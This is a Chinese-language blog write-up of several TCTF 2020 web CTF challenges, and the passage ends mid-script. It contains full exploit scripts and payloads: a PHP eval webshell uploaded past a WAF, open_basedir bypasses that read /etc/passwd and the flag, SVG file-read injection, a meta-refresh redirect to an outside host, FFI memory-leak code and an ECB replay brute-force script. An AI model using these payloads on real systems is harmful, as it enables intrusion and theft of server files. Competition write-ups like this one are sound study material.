<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.0"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><!--!--><title>TCTF2020部分题解 - ggb0n&#039;s Blog</title><meta description="比赛的时候做题一头雾水，很多题一知半解，不能自己独立完成，赛后看飘零师傅的题解进一步学习。"><meta property="og:type" content="article"><meta property="og:title" content="TCTF2020部分题解"><meta property="og:url" content="http://ggb0n.cool/2020/06/29/TCTF2020%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/"><meta property="og:site_name" content="ggb0n&#039;s blog"><meta property="og:description" content="比赛的时候做题一头雾水，很多题一知半解，不能自己独立完成，赛后看飘零师傅的题解进一步学习。"><meta property="og:locale" content="en_US"><meta property="og:image" content="http://ggb0n.cool/images/icon2.png"><meta property="article:published_time" content="2020-06-29T08:47:34.000Z"><meta property="article:modified_time" content="2020-07-26T04:53:10.935Z"><meta property="article:author" content="ggb0n"><meta property="article:tag" content="categories-java"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="http://ggb0n.cool/images/icon2.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://ggb0n.cool/2020/06/29/TCTF2020%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/"},"headline":"TCTF2020部分题解","image":["http://www.ggb0n.cool/images/back2.png"],"datePublished":"2020-06-29T08:47:34.000Z","dateModified":"2020-07-26T04:53:10.935Z","author":{"@type":"Person","name":"ggb0n"},"description":"比赛的时候做题一头雾水，很多题一知半解，不能自己独立完成，赛后看飘零师傅的题解进一步学习。"}</script><link rel="alternative" href="/atom.xml" title="ggb0n&#039;s Blog" type="application/atom+xml"><link rel="icon" href="http://www.ggb0n.cool/images/icon2.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><link rel="stylesheet" href="/css/style.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script><script src="/js/md5.min.js"></script></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo1.png" alt="ggb0n&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/friend">友链</a><a class="navbar-item" href="/message">留言</a><a class="navbar-item" href="/about">关于</a><a class="navbar-item" href="/tools">CyberChef</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><div class="card-image"><span class="image is-7by3"><img class="thumbnail" src="http://ggb0n.cool/images/tctf-top.png" alt="TCTF2020部分题解"></span></div><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><time class="level-item" dateTime="2020-06-29T08:47:34.000Z">2020-06-29</time><a class="commentCountImg" href="/2020/06/29/TCTF2020%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/#comment-container"><span class="display-none-class">aac8da2e055be0b7480d8686371e5dea</span><img class="not-gallery-item" src="/img/chat.svg"> <span class="commentCount" id="aac8da2e055be0b7480d8686371e5dea"> 99+</span>    </a><span class="level-item">20 minutes read (About 2983 words)</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">TCTF2020部分题解</h1><div class="content"><p>比赛的时候做题一头雾水，很多题一知半解，不能自己独立完成，赛后看飘零师傅的题解进一步学习。<a id="more"></a></p>
<h3 id="Cloud-Computing"><a href="#Cloud-Computing" class="headerlink" title="Cloud Computing"></a><strong>Cloud Computing</strong></h3><p>一道出在了 Misc 的题目，但是考的是 web 的 open_basedir bypass。</p>
<p>进入题目，给出源码：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> <span class="string">'function.php'</span>;</span><br><span class="line"></span><br><span class="line">$dir = <span class="string">'sandbox/'</span> . sha1($_SERVER[<span class="string">'REMOTE_ADDR'</span>] . $_SERVER[<span class="string">'HTTP_USER_AGENT'</span>]) . <span class="string">'/'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!file_exists($dir))&#123;</span><br><span class="line">  mkdir($dir);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">switch</span> ($_GET[<span class="string">"action"</span>] ?? <span class="string">""</span>) &#123;</span><br><span class="line">  <span class="keyword">case</span> <span class="string">'pwd'</span>:</span><br><span class="line">    <span class="keyword">echo</span> $dir;</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">  <span class="keyword">case</span> <span class="string">'upload'</span>:</span><br><span class="line">    $data = $_GET[<span class="string">"data"</span>] ?? <span class="string">""</span>;</span><br><span class="line">    <span class="keyword">if</span> (waf($data)) &#123;</span><br><span class="line">      <span class="keyword">die</span>(<span class="string">'waf sucks...'</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    file_put_contents(<span class="string">"$dir"</span> . <span class="string">"index.php"</span>, $data);</span><br><span class="line">  <span class="keyword">case</span> <span class="string">'shell'</span>:</span><br><span class="line">    initShellEnv($dir);</span><br><span class="line">    <span class="keyword">include</span> $dir . <span class="string">"index.php"</span>;</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">  <span class="keyword">default</span>:</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>显然需要在传参<code>upload</code>时写入小马 getshell，然后再传参<code>shell</code>来进行 RCE。</p>
<h4 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h4><p>由于引号，下划线等字符等字符被ban掉了，因此考虑无参数RCE，利用<code>eval(end(getallheaders()))</code>的方式结合在请求头中添加要执行的code从而bypass waf。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">data = <span class="string">"&lt;?=eval(end(getallheaders()));?&gt;"</span></span><br><span class="line">code = <span class="string">r"var_dump('ggb0n');"</span></span><br><span class="line">headers = &#123;<span class="string">'a'</span>:code&#125;</span><br></pre></td></tr></table></figure>

<p>执行结果如下：</p>
<p><img src="http://ggb0n.cool/images/tctf04.png" alt=""></p>
<p>但是依旧无法使用 phpinfo 等函数，怀疑是被disable_function给禁了，这里开启报错查看原因：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">code = <span class="string">r"error_reporting(-1);phpinfo();"</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ggb0n.cool/images/tctf05.png" alt=""></p>
<p>可以看到函数确实被禁了，同时借助 readfile 函数发现开启了 open basedir：</p>
<p><img src="http://ggb0n.cool/images/tctf06.png" alt=""></p>
<p>但是 sandbox 中可以任意创建文件和目录，因此可以结合 mkdir 和 chdir 进行 bypass，payload 如下：</p>
<figure class="highlight scilab"><table><tr><td class="code"><pre><span class="line">code = <span class="string">"error_reporting(E_ALL);chdir('</span>sandbox/<span class="number">52933</span>f6438c743819c0d2b1031d5547ab025d7d1/<span class="string">');mkdir('</span>x');<span class="built_in">chdir</span>(<span class="string">'x'</span>);ini_set(<span class="string">'open_basedir'</span>,<span class="string">'..'</span>);<span class="built_in">chdir</span>(<span class="string">'..'</span>);<span class="built_in">chdir</span>(<span class="string">'..'</span>);<span class="built_in">chdir</span>(<span class="string">'..'</span>);<span class="built_in">chdir</span>(<span class="string">'..'</span>);<span class="built_in">chdir</span>(<span class="string">'..'</span>);<span class="built_in">chdir</span>(<span class="string">'..'</span>);<span class="built_in">chdir</span>(<span class="string">'..'</span>);ini_set(<span class="string">'open_basedir'</span>,<span class="string">'/'</span>);print(base64_encode(file_get_contents(<span class="string">'/etc/passwd'</span>)));<span class="string">"</span></span><br></pre></td></tr></table></figure>

<p>回显如下：</p>
<p><img src="http://ggb0n.cool/images/tctf07.png" alt=""></p>
<p>可见成功 bypass，然后读取根目录下的 flag 文件即可，拿到一个 img 文件，其中隐藏了 flag 的图片。</p>
<p>完整exp如下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib </span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://pwnable.org:47780/?action=upload&amp;data=%s"</span></span><br><span class="line"></span><br><span class="line">data = <span class="string">"&lt;?=eval(end(getallheaders()));?&gt;"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#code = r"var_dump('ggb0n');"</span></span><br><span class="line"><span class="comment">#code = r"error_reporting(-1);phpinfo();"</span></span><br><span class="line"><span class="comment">#code = r"error_reporting(-1);readfile('/etc/passwd');"</span></span><br><span class="line"><span class="comment">#code = "error_reporting(E_ALL));chdir('/var/www/html/sandbox/52933f6438c743819c0d2b1031d5547ab025d7d1/');mkdir('ggb0n');chdir('ggb0n');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');readfile('/etc/passwd');"</span></span><br><span class="line">code = <span class="string">"error_reporting(E_ALL);chdir('sandbox/52933f6438c743819c0d2b1031d5547ab025d7d1/');mkdir('x');chdir('x');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print(base64_encode(file_get_contents('/flag')));"</span></span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">'a'</span>:code&#125;</span><br><span class="line"></span><br><span class="line">dir_url = <span class="string">"http://pwnable.org:47780/?action=pwd"</span></span><br><span class="line"></span><br><span class="line">first_url = url % data</span><br><span class="line">second_url = <span class="string">"http://pwnable.org:47780/?action=shell"</span></span><br><span class="line"></span><br><span class="line">r = requests.get(url=dir_url)</span><br><span class="line">print(r.content)</span><br><span class="line">r = requests.get(url=first_url,headers=headers)</span><br><span class="line">print(r.content)</span><br><span class="line">r = requests.get(url=second_url,headers=headers)</span><br><span class="line">print(r.content)</span><br></pre></td></tr></table></figure>

<h3 id="Wechat-Generator"><a href="#Wechat-Generator" class="headerlink" title="Wechat Generator"></a><strong>Wechat Generator</strong></h3><p>这题考察 ImageMagick 和 XSS</p>
<h4 id="解题-1"><a href="#解题-1" class="headerlink" title="解题"></a>解题</h4><p>拿到题目发现是一个生成聊天图片的页面，有 preview 和 share 两个按钮，前者用于生成，后者用于分享。</p>
<p><img src="http://ggb0n.cool/images/tctf08.png" alt=""></p>
<p>share 按钮可以获取到一个 url，即为生成图片的 url</p>
<p><img src="http://ggb0n.cool/images/tctf09.png" alt=""></p>
<p>访问该路径可以得到如下信息：</p>
<p><img src="http://ggb0n.cool/images/tctf12.png" alt=""></p>
<p>图中可以看到，我们会得到一个 png 的路径，浏览器去访问就可以得到生成的 png 图片，如果将 png 改为 txt 则会报错，但是改为 htm 却可以正常访问：</p>
<p><img src="http://ggb0n.cool/images/tctf13.png" alt=""></p>
<p>可以看到，回显中包含提交的信息字段内容，并且解析为 html 了，那么我们是否可以考虑引入标签进行闭合？</p>
<p>先看下 data 传参的内容：</p>
<p><img src="http://ggb0n.cool/images/tctf11.png" alt=""></p>
<p>我们构造 data 内容去读取flag试试，构造如下payload：</p>
<figure class="highlight json"><table><tr><td class="code"><pre><span class="line">[&#123;<span class="attr">"type"</span>:<span class="number">0</span>,<span class="attr">"message"</span>:<span class="string">"[aaa\" /&gt;&lt;image width=\"512\" height=\"512\" href=\"text:/flag\"/&gt;]"</span>&#125;]</span><br></pre></td></tr></table></figure>

<p>提交之后点击 share 按钮访问，得到生成的图片，放大之后看到内容如下：</p>
<p><img src="http://ggb0n.cool/images/tctf16.png" alt=""></p>
<p>说明这个思路是对的，那尝试读取 web 文件路径，想要读取<code>/proc/self/</code>下的内容，但是<code>proc</code>被过滤，双写绕过即可：</p>
<figure class="highlight json"><table><tr><td class="code"><pre><span class="line">[&#123;<span class="attr">"type"</span>:<span class="number">0</span>,<span class="attr">"message"</span>:<span class="string">"[aaa\" /&gt;&lt;image width=\"512\" height=\"512\" href=\"text:/prprococ/self\"/&gt;]"</span>&#125;]</span><br></pre></td></tr></table></figure>

<p>提交之后再次 share，得到图片信息如下：</p>
<p><img src="http://ggb0n.cool/images/tctf17.png" alt=""></p>
<p>说明这个方法是没问题的，通过寻找，可以发现<code>/app/app.py</code>存在，并且包含关键信息，如下payload读取：</p>
<figure class="highlight json"><table><tr><td class="code"><pre><span class="line">[&#123;<span class="attr">"type"</span>:<span class="number">0</span>,<span class="attr">"message"</span>:<span class="string">"[aaa\" /&gt;&lt;image width=\"512\" height=\"512\" href=\"text:/app/app.py\"/&gt;]"</span>&#125;]</span><br></pre></td></tr></table></figure>

<p><img src="http://ggb0n.cool/images/tctf18.png" alt=""></p>
<p>可以看到，存在<code>/SUp3r_S3cret_URL/0Nly_4dM1n_Kn0ws</code>路由，访问之后，页面跳转：</p>
<p><img src="http://ggb0n.cool/images/tctf19.png" alt=""></p>
<p>也就是要我们去构造 xss，使服务端触发 alert(1)</p>
<p>但是题目中存在CSP：</p>
<figure class="highlight csp"><table><tr><td class="code"><pre><span class="line"><span class="keyword">img-src</span> * data:; <span class="keyword">default-src</span> <span class="string">'self'</span>; <span class="keyword">style-src</span> <span class="string">'self'</span> <span class="string">'unsafe-inline'</span>; <span class="keyword">connect-src</span> <span class="string">'self'</span>; <span class="keyword">object-src</span> <span class="string">'none'</span>; <span class="keyword">base-uri</span> <span class="string">'self'</span></span><br></pre></td></tr></table></figure>

<p>并且 src 被过滤，还是通过双写进行绕过，但是又找不到可控的 js 文件，于是考虑用<code>meta</code>标签进行跳转：</p>
<figure class="highlight json"><table><tr><td class="code"><pre><span class="line">[&#123;<span class="attr">"type"</span>:<span class="number">0</span>,<span class="attr">"message"</span>:<span class="string">"[aaa\" /&gt;&lt;meMETAta content=\"0;url=http://ip/x.html\" http-equiv=\"refresh\"&gt;]"</span>&#125;]</span><br></pre></td></tr></table></figure>

<p>注意使用<code>htm</code>后缀。</p>
<h3 id="easyphp"><a href="#easyphp" class="headerlink" title="easyphp"></a>easyphp</h3><p>考察 bypass open_basedir</p>
<h4 id="解题-2"><a href="#解题-2" class="headerlink" title="解题"></a>解题</h4><p>首先 phpinfo 看一下，发现 disable_functions、open_basedir：</p>
<p><img src="http://ggb0n.cool/images/tctf21.png" alt=""></p>
<p><img src="http://ggb0n.cool/images/tctf22.png" alt=""></p>
<p>目录不可写，用如下的代码传参过去读取目录：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$file_list = <span class="keyword">array</span>();</span><br><span class="line">$it = <span class="keyword">new</span> DirectoryIterator(<span class="string">"glob:///*"</span>);</span><br><span class="line"><span class="keyword">foreach</span> ($it <span class="keyword">as</span> $f)&#123;</span><br><span class="line">    $file_list[] = $f-&gt;__toString();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$it = <span class="keyword">new</span> DirectoryIterator(<span class="string">"glob:///.*"</span>);</span><br><span class="line"><span class="keyword">foreach</span> ($it <span class="keyword">as</span> $f)&#123;</span><br><span class="line">    $file_list[] = $f-&gt;__toString();</span><br><span class="line">&#125;</span><br><span class="line">sort($file_list);</span><br><span class="line"><span class="keyword">foreach</span> ($file_list <span class="keyword">as</span> $f)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&#123;$f&#125;</span></span><br><span class="line"><span class="string">"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="http://ggb0n.cool/images/tctf20.png" alt=""></p>
<p>发现了 flag.h 和 flag.o 的存在，蚁剑插件“脚本执行”执行如下代码读取 flag.h 内容：</p>
<figure class="highlight less"><table><tr><td class="code"><pre><span class="line"><span class="selector-tag">mkdir</span>(<span class="string">'minx'</span>);</span><br><span class="line"><span class="selector-tag">chdir</span>(<span class="string">'minx'</span>);</span><br><span class="line"><span class="selector-tag">ini_set</span>(<span class="string">'open_basedir'</span>,<span class="string">'..'</span>);</span><br><span class="line"><span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);</span><br><span class="line"><span class="selector-tag">ini_set</span>(<span class="string">'open_basedir'</span>,<span class="string">'/'</span>);</span><br><span class="line"><span class="selector-tag">echo</span> <span class="selector-tag">file_get_contents</span>(<span class="string">'/flag.h'</span>);</span><br></pre></td></tr></table></figure>

<p>得到 flag.h 的内容如下：</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> FFI_LIB <span class="meta-string">"/flag.so"</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> FFI_SCOPE <span class="meta-string">"flag"</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">char</span>* <span class="title">flag_fUn3t1on_fFi</span><span class="params">()</span></span>;</span><br></pre></td></tr></table></figure>

<blockquote>
<p> php 7.4可使用 FFI 调用 c 函数，于是查看phpinfo，开启了 FFI。</p>
</blockquote>
<p>再执行如下代码读取到 flag：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$ffi = FFI::load(<span class="string">"/flag.h"</span>);</span><br><span class="line">$a = $ffi-&gt;flag_fUn3t1on_fFi();</span><br><span class="line"><span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt; <span class="number">30</span>; $i++) &#123; </span><br><span class="line"> print_r($a[$i]);   </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="noeasyphp"><a href="#noeasyphp" class="headerlink" title="noeasyphp"></a>noeasyphp</h3><p>继续考察 FFI，只不过php版本提高了，API也更改了。</p>
<h4 id="解题-3"><a href="#解题-3" class="headerlink" title="解题"></a>解题</h4><p>蚁剑脚本执行：</p>
<figure class="highlight lisp"><table><tr><td class="code"><pre><span class="line">var_dump(<span class="name">scandir</span>('glob<span class="symbol">:///*</span>'))</span><br></pre></td></tr></table></figure>

<p>发现仍然存在 flag.h 和 flag.o，想办法读取 flag.h，但是不像上一题，直接给出了读取 flag 的函数名，并且将 FFI:cdef 给禁用了，只好利用 FFI 中与内存相关的函数进行内存泄露，从而获取函数名。</p>
<p>飘零师傅的 exp：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://pwnable.org:19261"</span>params = &#123;<span class="string">"rh"</span>:<span class="string">'''</span></span><br><span class="line"><span class="string">try &#123;</span></span><br><span class="line"><span class="string">    $ffi=FFI::load("/flag.h");</span></span><br><span class="line"><span class="string">    //get flag</span></span><br><span class="line"><span class="string">    //$a = $ffi-&gt;flag_wAt3_uP_apA3H1();</span></span><br><span class="line"><span class="string">    //for($i = 0; $i &lt; 128; $i++)&#123;</span></span><br><span class="line"><span class="string">        echo $a[$i];</span></span><br><span class="line"><span class="string">    //&#125;</span></span><br><span class="line"><span class="string">    $a = $ffi-&gt;new("char[8]", false);</span></span><br><span class="line"><span class="string">    $a[0] = 'f';</span></span><br><span class="line"><span class="string">    $a[1] = 'l';</span></span><br><span class="line"><span class="string">    $a[2] = 'a';</span></span><br><span class="line"><span class="string">    $a[3] = 'g';</span></span><br><span class="line"><span class="string">    $a[4] = 'f';</span></span><br><span class="line"><span class="string">    $a[5] = 'l';</span></span><br><span class="line"><span class="string">    $a[6] = 'a';</span></span><br><span class="line"><span class="string">    $a[7] = 'g';</span></span><br><span class="line"><span class="string">    $b = $ffi-&gt;new("char[8]", false);</span></span><br><span class="line"><span class="string">    $b[0] = 'f';</span></span><br><span class="line"><span class="string">    $b[1] = 'l';</span></span><br><span class="line"><span class="string">    $b[2] = 'a';</span></span><br><span class="line"><span class="string">    $b[3] = 'g';</span></span><br><span class="line"><span class="string">    $newa = $ffi-&gt;cast("void*", $a);</span></span><br><span class="line"><span class="string">    var_dump($newa);</span></span><br><span class="line"><span class="string">    $newb = $ffi-&gt;cast("void*", $b);</span></span><br><span class="line"><span class="string">    var_dump($newb);</span></span><br><span class="line"><span class="string">    </span></span><br><span class="line"><span class="string">    $addr_of_a = FFI::new("unsigned long long");</span></span><br><span class="line"><span class="string">    FFI::memcpy($addr_of_a, FFI::addr($newa), 8);</span></span><br><span class="line"><span class="string">    var_dump($addr_of_a);</span></span><br><span class="line"><span class="string">    </span></span><br><span class="line"><span class="string">    $leak = FFI::new(FFI::arrayType($ffi-&gt;type('char'), [102400]), false);</span></span><br><span class="line"><span class="string">    FFI::memcpy($leak, $newa-0x20000, 102400);</span></span><br><span class="line"><span class="string">    $tmp = FFI::string($leak,102400);</span></span><br><span class="line"><span class="string">    var_dump($tmp);</span></span><br><span class="line"><span class="string">   </span></span><br><span class="line"><span class="string">    //var_dump($leak);</span></span><br><span class="line"><span class="string">    //$leak[0] = 0xdeadbeef;</span></span><br><span class="line"><span class="string">    //$leak[1] = 0x61616161;</span></span><br><span class="line"><span class="string">    //var_dump($a);</span></span><br><span class="line"><span class="string">    //FFI::memcpy($newa-0x8, $leak, 128*8);</span></span><br><span class="line"><span class="string">    //var_dump($a);</span></span><br><span class="line"><span class="string">    //var_dump(777);</span></span><br><span class="line"><span class="string">&#125; catch (FFI\Exception $ex) &#123;</span></span><br><span class="line"><span class="string">    echo $ex-&gt;getMessage(), PHP_EOL;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">var_dump(1);</span></span><br><span class="line"><span class="string">'''</span>&#125;</span><br><span class="line"></span><br><span class="line">res = requests.get(url=url,params=params)</span><br><span class="line"></span><br><span class="line">print((res.text).encode(<span class="string">"utf-8"</span>))</span><br></pre></td></tr></table></figure>

<p>获取到函数名<code>$a = $ffi-&gt;flag_wAt3_uP_apA3H1();</code></p>
<p>再次执行如下代码即可获取 flag：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$ffi = FFI::load(<span class="string">"/flag.h"</span>);</span><br><span class="line">$a = $ffi-&gt;flag_wAt3_uP_apA3H1();</span><br><span class="line"><span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt; <span class="number">30</span>; $i++) &#123; </span><br><span class="line"> print_r($a[$i]);   </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="lottery"><a href="#lottery" class="headerlink" title="lottery"></a>lottery</h3><p>一道 web + crypto 题目，考察分组密码的重放攻击，利用多个用户进行偷钱。</p>
<h4 id="解题-4"><a href="#解题-4" class="headerlink" title="解题"></a>解题</h4><p>题目共有五个接口：<code>register</code>、<code>login</code>、<code>buy</code>、<code>info</code>、<code>charge</code></p>
<p>注册并登录之后可以购买 lottery 或者购买 flag，但是 coin 明显不够，需要通过购买 lottery 来增加 coin，但是仅仅这样几乎不可能凑得狗钱去买 flag。</p>
<p>首先看一下 buy、info、charge三个路由的作用：</p>
<p>buy 可以购买 lottery，以此来增加 coin：</p>
<p><img src="http://ggb0n.cool/images/tctf01.png" alt=""></p>
<p>通过 bp 截包，可以发现点击 buy 之后，会跳转 info 路由，该路由是对上图中生成的 enc 进行解密，得到明文信息：</p>
<p><img src="http://ggb0n.cool/images/tctf02.png" alt=""></p>
<p>charge 路由是提交购买 lottery 的申请：</p>
<p><img src="http://ggb0n.cool/images/tctf03.png" alt=""></p>
<p>比赛的时候尝试直接改 coin 传参的值，结果行不通，由于不知道密文的生成方式，后面就是密码学师傅做出来的了。赛后看飘零师傅的题解才明白是分组密码的重放攻击。</p>
<h4 id="分析过程"><a href="#分析过程" class="headerlink" title="分析过程"></a>分析过程</h4><p>生成几组密文，结果发现每组密文的结尾是一样的，</p>
<figure class="highlight gcode"><table><tr><td class="code"><pre><span class="line"><span class="symbol">NFEbZFZjCg3</span>gtWhc<span class="number">8</span>Ys<span class="number">7</span>VqHQA<span class="number">95</span>DryQjHRh<span class="number">2</span>tLARA<span class="number">2</span>gqu<span class="number">5</span>s\/<span class="number">0</span>Tt<span class="number">0</span>wSubjK<span class="meta">o9</span>CR<span class="number">7</span>rF<span class="symbol">njfKMixVIRY5</span>dbMQ<span class="number">9</span>\/<span class="number">5</span>AYlLiR<span class="number">7</span>zBGZoi<span class="number">3</span>DhTX<span class="number">7</span>idZjl<span class="number">51</span>uaWb<span class="number">7</span>fyDebazEdvb<span class="number">6</span>joTDaZjFZc<span class="number">5</span>Bt<span class="number">0</span>z<span class="number">8</span>ZhT<span class="symbol">Nb0</span>fbSt<span class="number">9</span>reYD<span class="number">8</span>AcCI<span class="number">4</span>hIXsxZg=</span><br><span class="line"></span><br><span class="line">KS<span class="number">2</span>YKOxItMGdsfQsaKqRtwIqSIxFrGVl\/<span class="symbol">n0</span>QqIvlfMJDLDFMD<span class="name">G67</span>cwWd<span class="number">4</span>r\/fxwFdi<span class="number">5</span>OUGyUHac<span class="number">9</span>\/FSi<span class="number">9</span>\/T<span class="number">54</span>JBdL<span class="number">4</span>iacaoV<span class="number">3</span>cTJciBy<span class="number">8</span>zyODFKFwXCcaytygQ<span class="symbol">NtwfZdEK6</span>FWrCvVHCIYPIch<span class="number">4</span>ewOSPbSt<span class="number">9</span>reYD<span class="number">8</span>AcCI<span class="number">4</span>hIXsxZg=</span><br></pre></td></tr></table></figure>

<p>转为16进制发现最后的32位均为<code>f6d2b7dade603f007022388485ecc598</code>，应该是32位的padding，同时看到密文总长是256位。猜测位ECB分组模式的密码，普遍的攻击方式是重放攻击。</p>
<p>通过对两个不同用户的 enc 的 16 进制数据进行32、64、96、128位的替换，发现当替换128位时，将用户1的 lottery 完全替换为了用户2的 lottery，但是同时 user 的前两位也被替换了。</p>
<p>解题思路就是通过爆破注册多个可以使 user 的前两位一样的用户，爆破脚本如下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"></span><br><span class="line">register_url = <span class="string">'http://pwnable.org:2333/user/register'</span></span><br><span class="line">login_url = <span class="string">'http://pwnable.org:2333/user/login'</span></span><br><span class="line">lottery_url = <span class="string">'http://pwnable.org:2333/lottery/buy'</span></span><br><span class="line">info_url = <span class="string">'http://pwnable.org:2333/lottery/info'</span></span><br><span class="line"><span class="comment">#charge_url = http://pwnable.org:2333/lottery/charge</span></span><br><span class="line"></span><br><span class="line">usnamelist = <span class="string">"abcdefghijklmnopqrstuvwxyz"</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">register</span><span class="params">(usname,passwd,url)</span>:</span></span><br><span class="line">	usname = usname</span><br><span class="line">	passwd = passwd</span><br><span class="line">	url = url</span><br><span class="line">	data = &#123;<span class="string">'username'</span>:usname,<span class="string">'password'</span>:passwd&#125;</span><br><span class="line">	r = requests.post(url=url,data=data)</span><br><span class="line">	<span class="keyword">return</span> r.content</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">(usname,passwd,url)</span>:</span></span><br><span class="line">	usname = usname</span><br><span class="line">	passwd = passwd</span><br><span class="line">	url = url</span><br><span class="line">	data = &#123;<span class="string">'username'</span>:usname,<span class="string">'password'</span>:passwd&#125;</span><br><span class="line">	r = requests.post(url=url,data=data)</span><br><span class="line">	<span class="comment">#return r.headers</span></span><br><span class="line">	<span class="keyword">return</span> r.content</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">buy</span><span class="params">(token,url)</span>:</span></span><br><span class="line">	token = token</span><br><span class="line">	url = url</span><br><span class="line">	data = &#123;<span class="string">'api_token'</span>:token&#125;</span><br><span class="line">	r = requests.post(url=url,data=data)</span><br><span class="line">	<span class="keyword">return</span> r.json</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">info</span><span class="params">(enc,url)</span>:</span></span><br><span class="line">	enc = enc</span><br><span class="line">	url = url </span><br><span class="line">	data = &#123;<span class="string">"enc"</span>:enc&#125;</span><br><span 